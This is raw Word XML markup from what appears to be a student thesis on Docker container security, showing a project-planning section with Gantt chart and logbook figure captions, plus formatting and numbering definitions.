    <w:p w14:paraId="24DB1CB4" w14:textId="68A07CA6" w:rsidR="00AC592A" w:rsidRDefault="00AC592A" w:rsidP="00900794">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="239" w:name="_Toc87032957"/>
      <w:r>
        <w:t>Project planning</w:t>
      </w:r>
      <w:bookmarkEnd w:id="239"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FDAE1F1" w14:textId="45F7FBC4" w:rsidR="00AC592A" w:rsidRDefault="00F063E0" w:rsidP="00AC592A">
      <w:r>
        <w:t xml:space="preserve">For this project, Gantt chart was used to </w:t>
      </w:r>
      <w:r w:rsidR="00943860">
        <w:t>track and plan the progress of each task. The project is di</w:t>
      </w:r>
      <w:r w:rsidR="001B431A">
        <w:t xml:space="preserve">vided into three </w:t>
      </w:r>
      <w:r w:rsidR="00AB0510">
        <w:t xml:space="preserve">main </w:t>
      </w:r>
      <w:r w:rsidR="001B431A">
        <w:t>sections</w:t>
      </w:r>
      <w:r w:rsidR="00170227">
        <w:t xml:space="preserve"> containing Literature review, </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00C55E89">
        <w:t>design</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00C55E89">
        <w:t xml:space="preserve"> and imp</w:t>
      </w:r>
      <w:r w:rsidR="00B31E02">
        <w:t>lementation, testing and experimenting.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55826E56" w14:textId="31A48DCE" w:rsidR="00B62574" w:rsidRDefault="00B62574" w:rsidP="00B62574">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="46581B54" wp14:editId="61F1D723">
            <wp:extent cx="5359400" cy="3194501"/>
            <wp:effectExtent l="0" t="0" r="0" b="63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359984" cy="3194849"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="10E0E610" w14:textId="3C2BA37B" w:rsidR="00B62574" w:rsidRPr="00EA04CD" w:rsidRDefault="00FB6C9E" w:rsidP="00EA04CD">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="240" w:name="_Toc86858660"/>
      <w:bookmarkStart w:id="241" w:name="_Toc86867550"/>
      <w:r w:rsidRPr="00EA04CD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidRPr="00EA04CD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00EA04CD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidRPr="00EA04CD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00A53E61">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>69</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA04CD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00267DD2" w:rsidRPr="00EA04CD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="009538A6" w:rsidRPr="00EA04CD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">sample Gantt chart with </w:t>
      </w:r>
      <w:r w:rsidR="002917B1" w:rsidRPr="00EA04CD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>all the tasks.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="240"/>
      <w:bookmarkEnd w:id="241"/>
    </w:p>
    <w:p w14:paraId="2ED568F1" w14:textId="3F7D865A" w:rsidR="00093277" w:rsidRDefault="00093277" w:rsidP="00B41D3F"/>
    <w:p w14:paraId="4D97F27A" w14:textId="14259A66" w:rsidR="00781B44" w:rsidRDefault="00781B44" w:rsidP="00B62574">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2BC3D969" wp14:editId="05192B73">
            <wp:extent cx="5621930" cy="22479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621930" cy="2247900"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="01A0F727" w14:textId="25AE7C2B" w:rsidR="00FB6C9E" w:rsidRDefault="00FB6C9E" w:rsidP="00EA04CD">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="242" w:name="_Toc86858661"/>
      <w:bookmarkStart w:id="243" w:name="_Toc86867551"/>
      <w:r w:rsidRPr="00EA04CD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidRPr="00EA04CD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00EA04CD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidRPr="00EA04CD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00A53E61">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>70</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA04CD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="002917B1" w:rsidRPr="00EA04CD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="00EA04CD" w:rsidRPr="00EA04CD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>the project plan with Gantt chart.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="242"/>
      <w:bookmarkEnd w:id="243"/>
    </w:p>
    <w:p w14:paraId="79C35DFA" w14:textId="56F94677" w:rsidR="00945B0A" w:rsidRDefault="00945B0A" w:rsidP="00945B0A"/>
    <w:p w14:paraId="34112CCE" w14:textId="11F0B20E" w:rsidR="00945B0A" w:rsidRDefault="00945B0A" w:rsidP="00945B0A"/>
    <w:p w14:paraId="59EB870B" w14:textId="3BA8A789" w:rsidR="00945B0A" w:rsidRDefault="00945B0A" w:rsidP="00945B0A"/>
    <w:p w14:paraId="502FF3E2" w14:textId="5AABF905" w:rsidR="00945B0A" w:rsidRDefault="00945B0A" w:rsidP="00945B0A"/>
    <w:p w14:paraId="127D1F71" w14:textId="77777777" w:rsidR="00945B0A" w:rsidRPr="00945B0A" w:rsidRDefault="00945B0A" w:rsidP="00945B0A"/>
    <w:p w14:paraId="1C358906" w14:textId="7255EB84" w:rsidR="00153BD6" w:rsidRPr="00153BD6" w:rsidRDefault="00153BD6" w:rsidP="00153BD6">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="244" w:name="_Toc87032958"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>L</w:t>
      </w:r>
      <w:r w:rsidR="00D2185A">
        <w:t>og</w:t>
      </w:r>
      <w:r>
        <w:t>book</w:t>
      </w:r>
      <w:bookmarkEnd w:id="244"/>
    </w:p>
    <w:p w14:paraId="2A6AC213" w14:textId="538BC88A" w:rsidR="00093277" w:rsidRDefault="001018D6" w:rsidP="00B41D3F">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="65447EB4" wp14:editId="54F6C0AD">
            <wp:extent cx="4972050" cy="4065336"/>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973253" cy="4066320"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3499463A" w14:textId="14DA26F0" w:rsidR="00A53E61" w:rsidRPr="00360732" w:rsidRDefault="00A53E61" w:rsidP="00360732">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="245" w:name="_Toc86858662"/>
      <w:bookmarkStart w:id="246" w:name="_Toc86867552"/>
      <w:r w:rsidRPr="00360732">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidRPr="00360732">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00360732">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidRPr="00360732">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidRPr="00360732">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>71</w:t>
      </w:r>
      <w:r w:rsidRPr="00360732">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00360732">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="00AB77E0" w:rsidRPr="00360732">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00360732" w:rsidRPr="00360732">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Logbook</w:t>
      </w:r>
      <w:r w:rsidR="00360732">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="245"/>
      <w:bookmarkEnd w:id="246"/>
    </w:p>
    <w:p w14:paraId="17EE8B19" w14:textId="77777777" w:rsidR="00922EAC" w:rsidRPr="00922EAC" w:rsidRDefault="00922EAC" w:rsidP="00922EAC">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7FB98B86" w14:textId="77777777" w:rsidR="008B1D23" w:rsidRDefault="008B1D23" w:rsidP="0008759F"/>
    <w:p w14:paraId="043C081D" w14:textId="77777777" w:rsidR="0096369A" w:rsidRPr="00061A8B" w:rsidRDefault="0096369A" w:rsidP="0008759F"/>
    <w:p w14:paraId="4BCA735D" w14:textId="77777777" w:rsidR="004C2F14" w:rsidRPr="004C2F14" w:rsidRDefault="004C2F14" w:rsidP="004C2F14"/>
    <w:p w14:paraId="77DC403A" w14:textId="77777777" w:rsidR="00125B77" w:rsidRPr="00125B77" w:rsidRDefault="00125B77" w:rsidP="00125B77"/>
    <w:p w14:paraId="34C4CEC3" w14:textId="77777777" w:rsidR="00BD617D" w:rsidRPr="00E84EBF" w:rsidRDefault="00BD617D" w:rsidP="00E84EBF"/>
    <w:p w14:paraId="52710697" w14:textId="77777777" w:rsidR="004D0FCC" w:rsidRPr="004D0FCC" w:rsidRDefault="004D0FCC" w:rsidP="004D0FCC"/>
    <w:sectPr w:rsidR="004D0FCC" w:rsidRPr="004D0FCC" w:rsidSect="00757B5B">
      <w:footerReference w:type="default" r:id="rId7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3B599" w14:textId="77777777" w:rsidR="00E6142E" w:rsidRDefault="00E6142E" w:rsidP="002D68B6">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="0318AD40" w14:textId="77777777" w:rsidR="00E6142E" w:rsidRDefault="00E6142E" w:rsidP="002D68B6">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:continuationSeparator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationNotice" w:id="1">
    <w:p w14:paraId="7B5653BA" w14:textId="77777777" w:rsidR="00E6142E" w:rsidRDefault="00E614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5423834"/>
      <w:docPartObj>
        <w:docPartGallery w:val="Page Numbers (Bottom of Page)"/>
        <w:docPartUnique/>
      </w:docPartObj>
    </w:sdtPr>
    <w:sdtEndPr>
      <w:rPr>
        <w:noProof/>
      </w:rPr>
    </w:sdtEndPr>
    <w:sdtContent>
      <w:p w14:paraId="6968054C" w14:textId="59C3B07E" w:rsidR="00551777" w:rsidRDefault="00551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78067E" w14:textId="77777777" w:rsidR="00CB6F42" w:rsidRDefault="00CB6F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4531484"/>
      <w:docPartObj>
        <w:docPartGallery w:val="Page Numbers (Bottom of Page)"/>
        <w:docPartUnique/>
      </w:docPartObj>
    </w:sdtPr>
    <w:sdtEndPr>
      <w:rPr>
        <w:noProof/>
      </w:rPr>
    </w:sdtEndPr>
    <w:sdtContent>
      <w:p w14:paraId="16D46379" w14:textId="77777777" w:rsidR="006676E6" w:rsidRDefault="006676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F8DA4B" w14:textId="77777777" w:rsidR="006676E6" w:rsidRDefault="006676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2D4D9" w14:textId="77777777" w:rsidR="00E6142E" w:rsidRDefault="00E6142E" w:rsidP="002D68B6">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="6FCDF81A" w14:textId="77777777" w:rsidR="00E6142E" w:rsidRDefault="00E6142E" w:rsidP="002D68B6">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:continuationSeparator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationNotice" w:id="1">
    <w:p w14:paraId="52AF2B3F" w14:textId="77777777" w:rsidR="00E6142E" w:rsidRDefault="00E614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EDCDC" w14:textId="77777777" w:rsidR="00FB6DB6" w:rsidRDefault="00FB6DB6" w:rsidP="000B4213">
    <w:pPr>
      <w:pStyle w:val="Header"/>
      <w:pBdr>
        <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
      </w:pBdr>
    </w:pPr>
  </w:p>
  <w:p w14:paraId="370805D3" w14:textId="27D8DA63" w:rsidR="00C6446C" w:rsidRDefault="007826FF" w:rsidP="000B4213">
    <w:pPr>
      <w:pStyle w:val="Header"/>
      <w:pBdr>
        <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
      </w:pBdr>
    </w:pPr>
    <w:r>
      <w:t>Examine Docker</w:t>
    </w:r>
    <w:r w:rsidR="004B53FA">
      <w:t xml:space="preserve"> Containers</w:t>
    </w:r>
    <w:r>
      <w:t xml:space="preserve"> Security</w:t>
    </w:r>
    <w:r w:rsidR="00C6446C">
      <w:ptab w:relativeTo="margin" w:alignment="center" w:leader="none"/>
    </w:r>
    <w:r w:rsidR="00C6446C">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92A09"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="959E5A82"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="space"/>
      <w:lvlText w:val="CHAPTER %1"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="357" w:hanging="357"/>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714" w:hanging="357"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="space"/>
      <w:lvlText w:val="%1.%2.%3"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1071" w:hanging="357"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:hint="default"/>
        <w:sz w:val="22"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="1.111%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 w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="06883420"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="F07E9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16207"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="26C0E2B4"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="space"/>
      <w:lvlText w:val="CHAPTER %1"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="357" w:hanging="357"/>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714" w:hanging="357"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="space"/>
      <w:lvlText w:val="%1.%2.%3"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1071" w:hanging="357"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:hint="default"/>
        <w:sz w:val="22"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="1.111%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3" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="0BA03250"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="DF58E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D69AE"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="8F36B6A0"/>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15:restartNumberingAfterBreak="0">
    <w:nsid w:val="180E01AE"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="4F38682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98533C6"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="B5C031EE"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:pStyle w:val="Heading1"/>
      <w:suff w:val="space"/>
      <w:lvlText w:val="CHAPTER %1"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Times New Roman" w:hAnsi="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0" w:firstLine="0"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:hint="default"/>
        <w:sz w:val="22"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3">
      <w:start w:val="1"/>
      <w:numFmt w:val="none"/>
      <w:pStyle w:val="Heading4"/>
      <w:suff w:val="space"/>
      <w:lvlText w:val="1.1.1.1."/>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7" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="246F71A2"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="3932C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733FC1"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="4D46DA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E07120"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="506EE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A11F86"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="FDBA5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D621E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BC77E8F"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="2474B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013041"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="C8621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5F7667"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="08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43960E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D8B6511"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="58D0A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8542B8B"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="08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68F375C9"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="C7104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9766B1"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="A66E6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7231DF"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="C7FA50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E91788"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="04FEC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1B257F"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="76DEB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204373"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="A62EA9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8"/>
    <w:lvlOverride w:ilvl="0">
      <w:startOverride w:val="3"/>
    </w:lvlOverride>
    <w:lvlOverride w:ilvl="1">
      <w:startOverride w:val="1"/>
    </w:lvlOverride>
  </w:num>
  <w:num w:numId="2">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="3">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="4">
    <w:abstractNumId w:val="15"/>
  </w:num>
  <w:num w:numId="5">
    <w:abstractNumId w:val="19"/>
  </w:num>
  <w:num w:numId="6">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="7">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="8">
    <w:abstractNumId w:val="12"/>
  </w:num>
  <w:num w:numId="9">
    <w:abstractNumId w:val="16"/>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3"/>
  </w:num>
  <w:num w:numId="13">
    <w:abstractNumId w:val="25"/>
  </w:num>
  <w:num w:numId="14">
    <w:abstractNumId w:val="14"/>
  </w:num>
  <w:num w:numId="15">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="16">
    <w:abstractNumId w:val="17"/>
  </w:num>
  <w:num w:numId="17">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="18">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="19">
    <w:abstractNumId w:val="20"/>
  </w:num>
  <w:num w:numId="20">
    <w:abstractNumId w:val="23"/>
  </w:num>
  <w:num w:numId="21">
    <w:abstractNumId w:val="21"/>
  </w:num>
  <w:num w:numId="22">
    <w:abstractNumId w:val="24"/>
  </w:num>
  <w:num w:numId="23">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="24">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="25">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="26">
    <w:abstractNumId w:val="7"/>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A58"/>
    <w:rsid w:val="00000557"/>
    <w:rsid w:val="00000894"/>
    <w:rsid w:val="00000B3D"/>
    <w:rsid w:val="00001CB2"/>
    <w:rsid w:val="0000276D"/>
    <w:rsid w:val="000027FC"/>
    <w:rsid w:val="000028BB"/>
    <w:rsid w:val="0000296A"/>
    <w:rsid w:val="000029E8"/>
    <w:rsid w:val="00002CA1"/>
    <w:rsid w:val="00002E6A"/>
    <w:rsid w:val="00002F2C"/>
    <w:rsid w:val="00003283"/>
    <w:rsid w:val="00003BBE"/>
    <w:rsid w:val="00003BC3"/>
    <w:rsid w:val="00003F88"/>
    <w:rsid w:val="00004001"/>
    <w:rsid w:val="000042AC"/>
    <w:rsid w:val="00004394"/>
    <w:rsid w:val="00004416"/>
    <w:rsid w:val="00004467"/>
    <w:rsid w:val="00004567"/>
    <w:rsid w:val="000047E2"/>
    <w:rsid w:val="000048B0"/>
    <w:rsid w:val="000049B8"/>
    <w:rsid w:val="000050AB"/>
    <w:rsid w:val="000055F4"/>
    <w:rsid w:val="0000571C"/>
    <w:rsid w:val="00005A93"/>
    <w:rsid w:val="00005B54"/>
    <w:rsid w:val="00005C8B"/>
    <w:rsid w:val="00005D39"/>
    <w:rsid w:val="00005D7A"/>
    <w:rsid w:val="0000644E"/>
    <w:rsid w:val="00006C82"/>
    <w:rsid w:val="00006CC7"/>
    <w:rsid w:val="00006F20"/>
    <w:rsid w:val="000079EE"/>
    <w:rsid w:val="00007D2F"/>
    <w:rsid w:val="00010263"/>
    <w:rsid w:val="00010B5D"/>
    <w:rsid w:val="00010D8F"/>
    <w:rsid w:val="000110A8"/>
    <w:rsid w:val="000115B6"/>
    <w:rsid w:val="00011A67"/>
    <w:rsid w:val="00012349"/>
